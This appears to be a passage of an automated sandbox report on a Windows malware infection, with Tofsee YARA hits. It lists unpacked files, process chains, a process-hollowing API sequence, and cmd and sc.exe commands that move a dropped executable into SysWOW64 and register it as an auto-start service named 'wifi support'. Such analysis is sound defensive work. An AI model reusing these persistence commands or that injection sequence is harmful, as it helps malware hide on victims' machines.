Source: Yara match	File source: 22.0.49B.exe.4920e50.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.410473881.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.409608494.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.382884263.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.393584726.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.419422214.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.400296473.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.416098242.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.650305946.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.424554766.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.465918061.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.398407236.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.448938859.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.459235582.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.436435697.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 49B.exe PID: 3092, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 00000021.00000002.448334222.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.415728419.0000000002E80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.452136750.0000000002E40000.00000040.00000001.sdmp, type: MEMORY

System Summary:

PE file contains section with special chars

Show sources

Source: 1AB6.exe.6.dr	Static PE information: section name:
Source: 1AB6.exe.6.dr	Static PE information: section name: \|
Source: 2612.exe.6.dr	Static PE information: section name:
Source: 2612.exe.6.dr	Static PE information: section name: \|

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3092 -ip 3092

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_00402648	3_2_00402648
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_00402648	18_2_00402648
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0042B4DB	22_2_0042B4DB
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040FCEA	22_2_0040FCEA
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00434042	22_2_00434042
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00442030	22_2_00442030
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0045C0B6	22_2_0045C0B6
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_004201BE	22_2_004201BE
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0044C338	22_2_0044C338
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00436478	22_2_00436478
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0044C56A	22_2_0044C56A
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0044C7CF	22_2_0044C7CF
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0043C7F6	22_2_0043C7F6
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040C787	22_2_0040C787
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0041C80E	22_2_0041C80E
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_004368D6	22_2_004368D6
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00416959	22_2_00416959
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040E99E	22_2_0040E99E
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00414B4A	22_2_00414B4A
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0041EE40	22_2_0041EE40
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_00460EE2	22_2_00460EE2
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0040CEA6	22_2_0040CEA6
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0045CFC9	22_2_0045CFC9
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0041D11E	22_2_0041D11E
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: 22_2_0042D1C3	22_2_0042D1C3
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00442489	25_2_00442489
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00465C58	25_2_00465C58
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0047E2EC	25_2_0047E2EC
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0042E315	25_2_0042E315
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_004543E9	25_2_004543E9
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00478400	25_2_00478400
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00468540	25_2_00468540
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_0045A50A	25_2_0045A50A
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_004165C4	25_2_004165C4
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00438589	25_2_00438589
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_004266AB	25_2_004266AB
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00478895	25_2_00478895
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00452C4A	25_2_00452C4A
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: 25_2_00478C33	25_2_00478C33

Source: GzsKHwvBmG.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GzsKHwvBmG.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GzsKHwvBmG.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GzsKHwvBmG.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1EB.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 49B.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 49B.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 49B.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 49B.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1AB6.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 40A0.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 40A0.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 40A0.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 40A0.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hhiwwui.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hhiwwui.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hhiwwui.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hhiwwui.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: sqlite3.dll.22.dr

Static PE information: Number of sections : 18 > 10

Source: GzsKHwvBmG.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: String function: 00466830 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: String function: 0044E199 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: String function: 004125F4 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Code function: String function: 0043F5D8 appears 119 times
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: String function: 00404694 appears 125 times
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: String function: 00401016 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: String function: 0042A1DD appears 49 times
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Code function: String function: 0046E280 appears 33 times

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 1_2_02DE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	1_2_02DE0110
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_0040197F Sleep,NtTerminateProcess,	3_2_0040197F
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_0040198A Sleep,NtTerminateProcess,	3_2_0040198A
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_0040199C Sleep,NtTerminateProcess,	3_2_0040199C
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_004019A0 Sleep,NtTerminateProcess,	3_2_004019A0
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Code function: 3_2_004019B1 Sleep,NtTerminateProcess,	3_2_004019B1
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_0040197F Sleep,NtTerminateProcess,	18_2_0040197F
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_0040198A Sleep,NtTerminateProcess,	18_2_0040198A
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_0040199C Sleep,NtTerminateProcess,	18_2_0040199C
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_004019A0 Sleep,NtTerminateProcess,	18_2_004019A0
Source: C:\Users\user\AppData\Roaming\hhiwwui	Code function: 18_2_004019B1 Sleep,NtTerminateProcess,	18_2_004019B1

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_0043E45D: DeviceIoControl,GetLastError,

22_2_0043E45D

Source: .dll.23.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: .dll.23.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: GzsKHwvBmG.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 49B.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B72.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 40A0.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: hhiwwui.6.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 1AB6.exe.6.dr	Static PE information: Section: ZLIB complexity 0.995475672468
Source: 1AB6.exe.6.dr	Static PE information: Section: \| ZLIB complexity 0.999923406863
Source: 2612.exe.6.dr	Static PE information: Section: ZLIB complexity 1.00046875
Source: 2612.exe.6.dr	Static PE information: Section: \| ZLIB complexity 0.998433632426

Source: GzsKHwvBmG.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\1EB.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hhiwwui

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@64/25@428/11

Source: C:\Users\user\AppData\Local\Temp\E61.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: 23.0.B72.exe.e60000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 23.0.B72.exe.e60000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 23.0.B72.exe.e60000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
Source: 23.2.B72.exe.e60000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 23.2.B72.exe.e60000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 23.2.B72.exe.e60000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)

Source: 1EB.exe

Binary or memory string: \RRTexture.vbp

Source: GzsKHwvBmG.exe	Virustotal: Detection: 42%
Source: GzsKHwvBmG.exe	ReversingLabs: Detection: 45%

Source: C:\Users\user\Desktop\GzsKHwvBmG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GzsKHwvBmG.exe 'C:\Users\user\Desktop\GzsKHwvBmG.exe'
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Process created: C:\Users\user\Desktop\GzsKHwvBmG.exe 'C:\Users\user\Desktop\GzsKHwvBmG.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hhiwwui C:\Users\user\AppData\Roaming\hhiwwui
Source: C:\Users\user\AppData\Roaming\hhiwwui	Process created: C:\Users\user\AppData\Roaming\hhiwwui C:\Users\user\AppData\Roaming\hhiwwui
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1EB.exe C:\Users\user\AppData\Local\Temp\1EB.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\49B.exe C:\Users\user\AppData\Local\Temp\49B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B72.exe C:\Users\user\AppData\Local\Temp\B72.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E61.exe C:\Users\user\AppData\Local\Temp\E61.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3092 -ip 3092
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1AB6.exe C:\Users\user\AppData\Local\Temp\1AB6.exe
Source: C:\Users\user\AppData\Local\Temp\1AB6.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2612.exe C:\Users\user\AppData\Local\Temp\2612.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3092 -ip 3092
Source: C:\Users\user\AppData\Local\Temp\2612.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\40A0.exe C:\Users\user\AppData\Local\Temp\40A0.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\40A0.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\nkrwinfc\
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\40A0.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\bwlvafxv.exe' C:\Windows\SysWOW64\nkrwinfc\
Source: C:\Users\user\AppData\Local\Temp\49B.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 752
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3092 -ip 3092
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\40A0.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create nkrwinfc binPath= 'C:\Windows\SysWOW64\nkrwinfc\bwlvafxv.exe /d\'C:\Users\user\AppData\Local\Temp\40A0.exe\'' type= own start= auto DisplayName= 'wifi support'
Source: C:\Users\user\Desktop\GzsKHwvBmG.exe	Process created: C:\Users\user\Desktop\GzsKHwvBmG.exe 'C:\Users\user\Desktop\GzsKHwvBmG.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1EB.exe C:\Users\user\AppData\Local\Temp\1EB.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\49B.exe C:\Users\user\AppData\Local\Temp\49B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B72.exe C:\Users\user\AppData\Local\Temp\B72.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E61.exe C:\Users\user\AppData\Local\Temp\E61.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1AB6.exe C:\Users\user\AppData\Local\Temp\1AB6.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2612.exe C:\Users\user\AppData\Local\Temp\2612.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\40A0.exe C:\Users\user\AppData\Local\Temp\40A0.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hhiwwui	Process created: C:\Users\user\AppData\Roaming\hhiwwui C:\Users\user\AppData\Roaming\hhiwwui	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3092 -ip 3092
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3092 -ip 3092
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 752
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3092 -ip 3092
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\E61.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\1EB.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: 22_2_0043458A CoCreateInstance,

22_2_0043458A

Source: E61.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: E61.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: E61.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: E61.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: E61.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: E61.exe, 00000019.00000002.458901650.00000000040A0000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: E61.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\AppData\Local\Temp\B72.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Code function: 25_2_0040F881 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,FindCloseChangeNotification,

25_2_0040F881

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Mutant created: \Sessions\1\BaseNamedObjects\user987uh4b36teeorinthj

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\49B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B72.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
